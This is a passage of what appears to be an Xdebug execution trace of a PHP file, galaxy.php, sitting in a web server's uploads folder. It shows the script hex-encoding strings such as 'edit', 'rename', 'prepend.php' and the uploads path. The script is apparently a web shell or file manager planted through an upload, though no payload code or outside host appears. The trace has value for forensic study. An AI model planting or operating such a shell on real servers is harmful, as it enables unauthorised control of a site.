3	1662	0	0.057808	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1662	1	0.057820	484872
3	1662	R			108
3	1663	0	0.057832	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1663	1	0.057844	484904
3	1663	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1664	0	0.057873	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1664	1	0.057884	484872
3	1664	R			111
3	1665	0	0.057896	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1665	1	0.057907	484904
3	1665	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1666	0	0.057937	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1666	1	0.057948	484872
3	1666	R			97
3	1667	0	0.057961	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1667	1	0.057972	484904
3	1667	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1668	0	0.058002	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1668	1	0.058013	484872
3	1668	R			100
3	1669	0	0.058025	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1669	1	0.058037	484904
3	1669	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1670	0	0.058066	484848	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1670	1	0.058077	484888
3	1670	R			115
3	1671	0	0.058089	484848	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1671	1	0.058101	484920
3	1671	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1629	1	0.058131	484848
2	1629	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1672	0	0.058147	484832	hex	1		/var/www/html/uploads/galaxy.php	117	1	'edit'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1673	0	0.058179	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1673	1	0.058191	484872
3	1673	R			101
3	1674	0	0.058203	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1674	1	0.058215	484904
3	1674	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1675	0	0.058245	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1675	1	0.058257	484904
3	1675	R			100
3	1676	0	0.058269	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1676	1	0.058281	484936
3	1676	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1677	0	0.058310	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	1677	1	0.058322	484904
3	1677	R			105
3	1678	0	0.058334	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	1678	1	0.058346	484936
3	1678	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1679	0	0.058376	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1679	1	0.058387	484904
3	1679	R			116
3	1680	0	0.058399	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1680	1	0.058411	484936
3	1680	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1672	1	0.058440	484872
2	1672	R			'65646974'
2	1681	0	0.058457	484832	hex	1		/var/www/html/uploads/galaxy.php	117	1	'prepend.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1682	0	0.058489	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1682	1	0.058500	484872
3	1682	R			112
3	1683	0	0.058512	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1683	1	0.058524	484904
3	1683	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1684	0	0.058553	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1684	1	0.058565	484904
3	1684	R			114
3	1685	0	0.058577	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1685	1	0.058588	484936
3	1685	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1686	0	0.058618	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1686	1	0.058630	484904
3	1686	R			101
3	1687	0	0.058642	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1687	1	0.058654	484936
3	1687	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1688	0	0.058683	484864	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1688	1	0.058695	484904
3	1688	R			112
3	1689	0	0.058707	484864	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1689	1	0.058719	484936
3	1689	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1690	0	0.058749	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1690	1	0.058761	484912
3	1690	R			101
3	1691	0	0.058773	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1691	1	0.058785	484944
3	1691	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1692	0	0.058824	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1692	1	0.058836	484912
3	1692	R			110
3	1693	0	0.058848	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1693	1	0.058861	484944
3	1693	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1694	0	0.058890	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1694	1	0.058902	484912
3	1694	R			100
3	1695	0	0.058915	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1695	1	0.058926	484944
3	1695	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1696	0	0.058956	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1696	1	0.058967	484912
3	1696	R			46
3	1697	0	0.058980	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1697	1	0.058991	484944
3	1697	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1698	0	0.059021	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1698	1	0.059033	484920
3	1698	R			112
3	1699	0	0.059045	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1699	1	0.059057	484952
3	1699	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1700	0	0.059086	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1700	1	0.059098	484920
3	1700	R			104
3	1701	0	0.059110	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1701	1	0.059122	484952
3	1701	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1702	0	0.059152	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1702	1	0.059163	484920
3	1702	R			112
3	1703	0	0.059175	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1703	1	0.059192	484952
3	1703	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1681	1	0.059222	484880
2	1681	R			'70726570656e642e706870'
2	1704	0	0.059237	485024	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1705	0	0.059268	485024	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1705	1	0.059280	485064
3	1705	R			47
3	1706	0	0.059293	485024	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1706	1	0.059305	485096
3	1706	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1707	0	0.059335	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1707	1	0.059347	485096
3	1707	R			118
3	1708	0	0.059360	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1708	1	0.059371	485128
3	1708	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1709	0	0.059401	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1709	1	0.059413	485096
3	1709	R			97
3	1710	0	0.059425	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1710	1	0.059437	485128
3	1710	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1711	0	0.059466	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1711	1	0.059477	485096
3	1711	R			114
3	1712	0	0.059489	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1712	1	0.059501	485128
3	1712	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1713	0	0.059530	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1713	1	0.059541	485104
3	1713	R			47
3	1714	0	0.059554	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1714	1	0.059565	485136
3	1714	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1715	0	0.059595	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1715	1	0.059606	485104
3	1715	R			119
3	1716	0	0.059618	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1716	1	0.059630	485136
3	1716	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1717	0	0.059659	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1717	1	0.059671	485104
3	1717	R			119
3	1718	0	0.059683	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1718	1	0.059694	485136
3	1718	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1719	0	0.059723	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1719	1	0.059735	485104
3	1719	R			119
3	1720	0	0.059747	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1720	1	0.059758	485136
3	1720	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1721	0	0.059788	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1721	1	0.059799	485112
3	1721	R			47
3	1722	0	0.059811	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1722	1	0.059823	485144
3	1722	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1723	0	0.059852	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1723	1	0.059864	485112
3	1723	R			104
3	1724	0	0.059876	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1724	1	0.059887	485144
3	1724	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1725	0	0.059920	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1725	1	0.059932	485112
3	1725	R			116
3	1726	0	0.059944	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1726	1	0.059955	485144
3	1726	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1727	0	0.059986	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1727	1	0.059997	485112
3	1727	R			109
3	1728	0	0.060009	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1728	1	0.060021	485144
3	1728	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1729	0	0.060051	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1729	1	0.060062	485120
3	1729	R			108
3	1730	0	0.060075	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1730	1	0.060086	485152
3	1730	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1731	0	0.060116	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1731	1	0.060127	485120
3	1731	R			47
3	1732	0	0.060139	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1732	1	0.060150	485152
3	1732	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1733	0	0.060180	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1733	1	0.060192	485120
3	1733	R			117
3	1734	0	0.060204	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1734	1	0.060215	485152
3	1734	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1735	0	0.060244	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1735	1	0.060255	485120
3	1735	R			112
3	1736	0	0.060267	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1736	1	0.060279	485152
3	1736	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1737	0	0.060308	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1737	1	0.060319	485128
3	1737	R			108
3	1738	0	0.060332	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1738	1	0.060343	485160
3	1738	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1739	0	0.060373	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1739	1	0.060384	485128
3	1739	R			111
3	1740	0	0.060396	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1740	1	0.060408	485160
3	1740	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1741	0	0.060437	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1741	1	0.060449	485128
3	1741	R			97
3	1742	0	0.060461	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1742	1	0.060472	485160
3	1742	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1743	0	0.060502	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1743	1	0.060513	485128
3	1743	R			100
3	1744	0	0.060525	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1744	1	0.060536	485160
3	1744	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1745	0	0.060566	485104	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1745	1	0.060577	485144
3	1745	R			115
3	1746	0	0.060589	485104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1746	1	0.060600	485176
3	1746	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1704	1	0.060634	485104
2	1704	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1747	0	0.060649	485024	hex	1		/var/www/html/uploads/galaxy.php	117	1	'rename'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1748	0	0.060681	485024	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1748	1	0.060692	485064
3	1748	R			114
3	1749	0	0.060707	485024	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1749	1	0.060719	485096
3	1749	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1750	0	0.060749	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1750	1	0.060760	485096
3	1750	R			101
3	1751	0	0.060772	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1751	1	0.060784	485128
3	1751	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1752	0	0.060813	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1752	1	0.060825	485096
3	1752	R			110
3	1753	0	0.060837	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1753	1	0.060848	485128
3	1753	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1754	0	0.060881	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1754	1	0.060892	485096
3	1754	R			97
3	1755	0	0.060904	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1755	1	0.060954	485128
3	1755	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1756	0	0.060985	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1756	1	0.060997	485104
3	1756	R			109
3	1757	0	0.061010	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1757	1	0.061021	485136
3	1757	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1758	0	0.061051	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1758	1	0.061062	485104
3	1758	R			101
3	1759	0	0.061074	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1759	1	0.061085	485136
3	1759	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1747	1	0.061115	485064
2	1747	R			'72656e616d65'
2	1760	0	0.061129	485024	hex	1		/var/www/html/uploads/galaxy.php	117	1	'prepend.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1761	0	0.061160	485024	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1761	1	0.061172	485064
3	1761	R			112
3	1762	0	0.061184	485024	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1762	1	0.061195	485096
3	1762	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1763	0	0.061226	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1763	1	0.061237	485096
3	1763	R			114
3	1764	0	0.061249	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1764	1	0.061260	485128
3	1764	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1765	0	0.061292	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1765	1	0.061304	485096
3	1765	R			101
3	1766	0	0.061328	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1766	1	0.061339	485128
3	1766	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1767	0	0.061369	485056	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1767	1	0.061384	485096
3	1767	R			112
3	1768	0	0.061396	485056	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1768	1	0.061408	485128
3	1768	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1769	0	0.061437	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1769	1	0.061449	485104
3	1769	R			101
3	1770	0	0.061461	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1770	1	0.061472	485136
3	1770	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1771	0	0.061501	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1771	1	0.061513	485104
3	1771	R			110
3	1772	0	0.061525	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1772	1	0.061536	485136
3	1772	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1773	0	0.061565	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1773	1	0.061577	485104
3	1773	R			100
3	1774	0	0.061589	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1774	1	0.061600	485136
3	1774	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1775	0	0.061629	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1775	1	0.061641	485104
3	1775	R			46
3	1776	0	0.061653	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1776	1	0.061664	485136
3	1776	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1777	0	0.061693	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1777	1	0.061705	485112
3	1777	R			112
3	1778	0	0.061717	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1778	1	0.061728	485144
3	1778	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1779	0	0.061757	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1779	1	0.061768	485112
3	1779	R			104
3	1780	0	0.061781	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1780	1	0.061792	485144
3	1780	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1781	0	0.061822	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1781	1	0.061833	485112
3	1781	R			112
3	1782	0	0.061846	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1782	1	0.061857	485144
3	1782	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1760	1	0.061886	485072
2	1760	R			'70726570656e642e706870'
2	1783	0	0.061901	485152	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1784	0	0.061932	485152	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1784	1	0.061944	485192
3	1784	R			47
3	1785	0	0.061956	485152	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1785	1	0.061968	485224
3	1785	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1786	0	0.061998	485184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1786	1	0.062009	485224
3	1786	R			118
3	1787	0	0.062021	485184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1787	1	0.062033	485256
3	1787	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1788	0	0.062062	485184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1788	1	0.062074	485224
3	1788	R			97
3	1789	0	0.062086	485184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1789	1	0.062101	485256
3	1789	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1790	0	0.062131	485184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1790	1	0.062143	485224
3	1790	R			114
3	1791	0	0.062155	485184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1791	1	0.062166	485256
3	1791	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1792	0	0.062196	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1792	1	0.062208	485232
3	1792	R			47
3	1793	0	0.062220	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1793	1	0.062232	485264
3	1793	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1794	0	0.062261	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1794	1	0.062272	485232
3	1794	R			119
3	1795	0	0.062285	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1795	1	0.062296	485264
3	1795	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1796	0	0.062325	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1796	1	0.062337	485232
3	1796	R			119
3	1797	0	0.062349	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1797	1	0.062360	485264
3	1797	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1798	0	0.062389	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1798	1	0.062400	485232
3	1798	R			119
3	1799	0	0.062412	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1799	1	0.062423	485264
3	1799	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1800	0	0.062452	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1800	1	0.062464	485240
3	1800	R			47
3	1801	0	0.062476	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1801	1	0.062487	485272
3	1801	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1802	0	0.062517	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1802	1	0.062528	485240
3	1802	R			104
3	1803	0	0.062540	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1803	1	0.062552	485272
3	1803	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1804	0	0.062581	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1804	1	0.062593	485240
3	1804	R			116
3	1805	0	0.062605	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1805	1	0.062616	485272
3	1805	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1806	0	0.062646	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1806	1	0.062657	485240
3	1806	R			109
3	1807	0	0.062669	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1807	1	0.062681	485272
3	1807	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
